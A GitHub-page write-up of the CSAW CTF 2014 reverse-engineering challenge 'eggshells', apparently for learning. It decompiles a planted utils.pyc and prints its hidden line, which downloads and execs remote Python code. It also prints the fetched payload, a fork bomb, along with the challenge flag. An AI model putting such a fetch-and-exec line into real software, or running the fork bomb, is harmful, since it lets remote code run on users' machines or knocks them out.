Skip to content

Latest commit

 

History

History
 
 

eggshells

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

CSAW CTF 2014: eggshells

Category: Reverse Engineering Points: 100 Description:

I trust people on the internet all the time, do you?

Written by ColdHeat

eggshells-master.zip

Write-up

Let’s unzip the provided zip file:

$ unzip eggshells-master.zip

This creates a directory eggshells-master that contains a bunch of Python files. One compiled Python file, utils.pyc, stands out. Let’s decompile it using uncompyle2:

$ uncompyle2 utils.pyc
# 2014.09.22 10:53:48 CEST
#Embedded file name: /Users/kchung/Desktop/CSAW Quals 2014/rev100/utils.py
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
+++ okay decompyling utils.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.09.22 10:53:48 CEST

That URL looks interesting.

$ curl 'http://kchung.co/lol.py'
import os
while True:
    try:
        os.fork()
    except:
        os.system('start')
# flag{trust_is_risky}

The flag is trust_is_risky.

Other write-ups and resources